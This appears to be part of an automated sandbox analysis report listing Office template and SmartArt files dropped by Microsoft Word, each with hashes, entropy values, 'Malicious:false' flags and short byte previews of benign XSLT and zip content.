                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):254875
                                                  Entropy (8bit):5.003842588822783
                                                  Encrypted:false
                                                  SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                  MD5:377B3E355414466F3E3861BCE1844976
                                                  SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                  SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                  SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):242
                                                  Entropy (8bit):3.4938093034530917
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                  MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                  SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                  SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                  SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):4888
                                                  Entropy (8bit):7.8636569313247335
                                                  Encrypted:false
                                                  SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                  MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                  SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                  SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                  SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                  Malicious:false
                                                  Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):274
                                                  Entropy (8bit):3.438490642908344
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                  MD5:0F98498818DC28E82597356E2650773C
                                                  SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                  SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                  SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Word 2007+
                                                  Category:dropped
                                                  Size (bytes):34415
                                                  Entropy (8bit):7.352974342178997
                                                  Encrypted:false
                                                  SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                  MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                  SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                  SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                  SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                  Malicious:false
                                                  Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):286
                                                  Entropy (8bit):3.538396048757031
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:149948E41627BE5DC454558E12AF2DA4
                                                  SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                  SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                  SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):250983
                                                  Entropy (8bit):5.057714239438731
                                                  Encrypted:false
                                                  SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                  MD5:F883B260A8D67082EA895C14BF56DD56
                                                  SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                  SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                  SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):286
                                                  Entropy (8bit):3.4670546921349774
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                  MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                  SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                  SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                  SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):5630
                                                  Entropy (8bit):7.87271654296772
                                                  Encrypted:false
                                                  SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                  MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                  SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                  SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                  SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                  Malicious:false
                                                  Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):280
                                                  Entropy (8bit):3.484503080761839
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                  MD5:1309D172F10DD53911779C89A06BBF65
                                                  SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                  SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                  SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):9191
                                                  Entropy (8bit):7.93263830735235
                                                  Encrypted:false
                                                  SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                  MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                  SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                  SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                  SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                  Malicious:false
                                                  Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):290
                                                  Entropy (8bit):3.5081874837369886
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                  MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                  SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                  SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                  SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):255948
                                                  Entropy (8bit):5.103631650117028
                                                  Encrypted:false
                                                  SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                  MD5:9888A214D362470A6189DEFF775BE139
                                                  SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                  SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                  SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):562113
                                                  Entropy (8bit):7.67409707491542
                                                  Encrypted:false
                                                  SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                  MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                  SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                  SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                  SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                  Malicious:false
                                                  Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):278
                                                  Entropy (8bit):3.535736910133401
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                  MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                  SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                  SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                  SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):258
                                                  Entropy (8bit):3.4692172273306268
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                  MD5:C1B36A0547FB75445957A619201143AC
                                                  SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                  SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                  SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):7370
                                                  Entropy (8bit):7.9204386289679745
                                                  Encrypted:false
                                                  SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                  MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                  SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                  SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                  SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                  Malicious:false
                                                  Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):777647
                                                  Entropy (8bit):7.689662652914981
                                                  Encrypted:false
                                                  SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                  MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                  SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                  SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
